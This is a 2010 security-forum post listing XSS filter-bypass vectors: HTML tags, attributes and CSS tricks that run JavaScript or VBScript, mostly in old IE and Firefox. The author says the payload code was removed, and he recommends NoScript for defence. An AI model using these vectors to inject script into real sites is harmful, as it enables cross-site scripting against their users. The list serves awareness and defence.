Author Topic: JavaScript to bypass many filters...  (Read 1914 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast √úberevangelist
  • Probably Bot
  • *****
  • Posts: 33895
  • malware fighter
JavaScript to bypass many filters...
« on: July 19, 2010, 12:28:34 AM »
Hi malware fighters,

Here is a list:
Code: [Select]
<a href="javascript#">
  <div onmouseover=">
  <img src="javascript:">
  <img dynsrc="javascript:"> [IE]
  <input type="image" dynsrc="javascript:"> [IE]
  <bgsound src="javascript:"> [IE]
  &{}; [Fx
  <img src=&{};> [Fx]
  <link rel="stylesheet" href="javascript:">
  <iframe src="vbscript:"> [IE]
  <img src="mocha:"> [Fx]
  <img src="livescript:"> [Fx
  <a href="about:<script></script>">
  <meta http-equiv="refresh" content="0;url=javascript:">
  <body onload="">
  <div style="background-image: url(javascript:);">
  <div style="behaviour: url([link to code]);"> [IE]
  <div style="binding: url([link to code]);"> [Mozilla]
  <div style="width: expression();"> [IE]
  <style type="text/javascript"></style> [Fx]
  <object classid="clsid:..." codebase="javascript:"> [IE]
  <!-- -- --><script></script><!-- -- -->
  <img src="blah"onmouseover="">
  <img src="blah>" onmouseover="">
  <xml src="javascript:">
  <xml id="X"><a><b>&lt;script>&lt;/script>;</b></a></xml>
    <div datafld="b" dataformatas="html" datasrc="#X"></div>
  [\xC0][\xBC]script>[\xC0][\xBC]/script> [UTF-8; IE, Opera]
  <![CDATA[<!--]] ><script>//--></script>

For security reasons I took where the code should go out of the examples
some only apply to specific browsers , so have your NS extension active...
firekeeper blocks them all...

« Last Edit: July 19, 2010, 12:36:11 AM by polonus »
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!